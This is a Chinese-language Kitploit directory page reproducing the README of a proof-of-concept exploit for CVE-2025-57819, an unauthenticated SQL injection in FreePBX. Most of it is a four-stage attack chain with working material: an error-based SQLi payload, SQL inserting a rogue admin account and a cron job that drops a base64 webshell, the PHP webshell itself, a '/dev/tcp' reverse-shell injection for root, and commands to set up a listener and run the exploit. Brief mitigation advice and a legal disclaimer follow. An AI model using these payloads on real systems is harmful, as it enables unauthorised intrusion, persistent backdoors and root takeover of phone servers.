Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
FreePBX-SQLi-RCE — CVE-2025-57819 的概念验证漏洞利用,这是 FreePBX 中的一个未认证 SQL 注入漏洞,可串联管理员账户创建、webshell 部署和 root 提权,最终实现 RCE。 | Kitploit
工具/GitHubGitHub/thescriptkiddoz/freepbx-sqli-rce
权限提升漏洞分析漏洞利用Web应用程序漏洞利用后渗透利用Web安全渗透测试论文与研究远程访问工具Payload 开发
GitHubthescriptkiddoz/freepbx-sqli-rce
3个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

FreePBX-SQLi-RCE

CVE-2025-57819 的概念验证漏洞利用,这是 FreePBX 中的一个未认证 SQL 注入漏洞,可串联管理员账户创建、webshell 部署和 root 提权,最终实现 RCE。

查看仓库

FreePBX CVE-2025-57819 - 未授权 SQLi 到 RCE PoC

Python License

仅供教育与安全研究使用 - 请参阅下方法律声明

针对 CVE-2025-57819 的漏洞利用概念验证,这是 FreePBX 中一个严重的未授权 SQL 注入漏洞,可导致远程代码执行。本 PoC 是在官方补丁发布之后才公开的,仅供安全研究和授权测试使用。

概述

FreePBX 15.x、16.x 和 17.x 版本(低于已修补版本)在 endpoint 模块的 AJAX 处理器中存在未授权 SQL 注入漏洞。该漏洞利用链允许:

  1. 创建管理员账户 通过 SQL 注入
  2. 部署 webshell 通过已认证的 cron 任务注入
  3. 提权至 root(如果 incron 可用)通过 sysadmin_manager 钩子链
  4. 完全系统沦陷 并获得反向 shell 访问

漏洞详情

CVE IDCVE-2025-57819
类型未授权 SQL 注入(基于报错)
CVSS9.8 / 10.0(严重)
受影响版本FreePBX 15 < 15.0.66, 16 < 16.0.89, 17 < 17.0.3
已修补版本15.0.66, 16.0.89, 17.0.3+
CISA KEV是(2025 年 8 月 29 日)

存在漏洞的端点

GET /admin/ajax.php?brand=<PAYLOAD>

endpoint 模块 AJAX 处理器中的 brand 参数接受用户输入而未进行验证,导致基于报错的 SQL 注入。


漏洞利用链

阶段 1:SQL 注入与管理员账户创建

使用 EXTRACTVALUE() 基于报错的提取方式验证 SQLi,以泄露数据库名称:

x' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT DATABASE()),0x7e))-- -

向 asterisk.ampusers 插入新的管理员用户:

INSERT INTO ampusers (username, password_hash, admin) 
VALUES ('pbx_xxxxxxxx', '<MD5_HASH>', 1)

阶段 2:已认证的 Cron 任务注入

利用有效的管理员凭据,该漏洞利用程序向 FreePBX 进行身份验证并建立已认证会话。会话 cookie 会被保存,并用于所有后续的已认证请求。

向 asterisk.cron_jobs 注入 webshell 命令:

INSERT INTO cron_jobs (modulename, jobname, command, class, schedule, max_runtime, enabled, execution_order)
VALUES ('sysadmin', 'wx', 'echo <BASE64_WEBSHELL>|base64 -d >/var/www/html/shell.php', NULL, '* * * * *', 30, 1, 1)

FreePBX cron 运行器以 asterisk 用户身份执行该命令,从而植入 PHP webshell。

阶段 3:Webshell 激活

PHP webshell 被部署到 /var/www/html/shell.php:

<?php system($_GET['cmd']); ?>

漏洞利用程序轮询 webshell 直到其激活,从而以 asterisk 用户(uid=999)身份实现 RCE。

阶段 4:提权(有条件)

如果目标上配置了 incron:

  1. 在 /var/spool/asterisk/incron/ 中创建触发文件
  2. incrond(以 root 身份运行)检测到文件创建
  3. 使用触发文件名调用 /usr/bin/sysadmin_manager
  4. sysadmin_manager 验证 GPG 签名并分发到 fwconsole-commands 钩子
  5. 钩子解码 payload 并执行:/usr/sbin/fwconsole <COMMAND>
  6. 命令注入:help; bash -i >& /dev/tcp/LHOST/LPORT 0>&1

结果:在反向监听器上获得 root shell(如果 incron 可用)。


它滥用了什么

  • brand 参数没有输入验证
  • 堆叠查询执行允许数据库操作
  • 可写的 asterisk.cron_jobs 表以 asterisk 身份执行命令
  • 通过所创建管理员账户的 cookie 实现已认证会话持久化
  • 以 root 身份运行的 Incron 文件系统监控
  • 未经验证的 fwconsole 钩子执行及命令注入

安装

git clone https://github.com/JazzTheRabbit/cve-2025-57819.git
cd cve-2025-57819
pip3 install requests
chmod +x JTR-CVE-2025-57819.py

使用方法

# Setup Netcat Listener
nc -lvnp <Listener Port>

# Run The Exploit
python3 JTR-CVE-2025-57819.py <TARGET_IP> <YOUR_IP> <PORT>

PoC

PoC Screenshot


受影响版本

版本状态
15.0.0 - 15.0.65存在漏洞
15.0.66+已修补
16.0.0 - 16.0.88存在漏洞
16.0.89+已修补
17.0.0 - 17.0.2存在漏洞
17.0.3+已修补

缓解措施

立即:

  • 限制来自不受信任网络的 /admin/ajax.php 访问
  • 如果不需要,禁用 incron:systemctl disable incrond

永久: 升级到已修补版本:15.0.66+、16.0.89+ 或 17.0.3+


参考资料

  • CVE-2025-57819
  • CISA KEV Catalog
  • FreePBX Security Advisory

法律声明

⚠️ 免责声明

本概念验证仅供授权的安全测试和教育目的提供。作者对因滥用本工具或本工具造成的损害不承担任何责任。

您必须遵守:

  • 《计算机欺诈与滥用法案》(CFAA)及您所在司法管辖区的同等法律
  • 仅测试您拥有或获得明确书面授权测试的系统
  • 在进行任何安全测试之前获得书面许可
  • 负责任的披露实践
  • 隐私和数据保护法规(GDPR、CCPA 等)

禁止用途:

  • 未经授权访问计算机系统
  • 未经书面同意的渗透测试
  • 破坏服务或窃取数据
  • 任何恶意或非法活动

责任豁免: 作者不对以下情况负责:

  • 未经授权的访问或刑事指控
  • 系统损坏或数据丢失
  • 滥用的法律后果
  • 违反计算机欺诈法律

此漏洞:

  • 已公开披露(CVE-2025-57819)
  • 补丁已公开可用
  • 仅为安全研究而发布
  • 在补丁发布后负责任地共享

作者

JazzTheRabbit

  • GitHub: @JazzTheRabbit
  • HackTheBox: @JazzTheRabbit
  • YouTube: JazzTheRabbit

许可证

MIT License

下载工具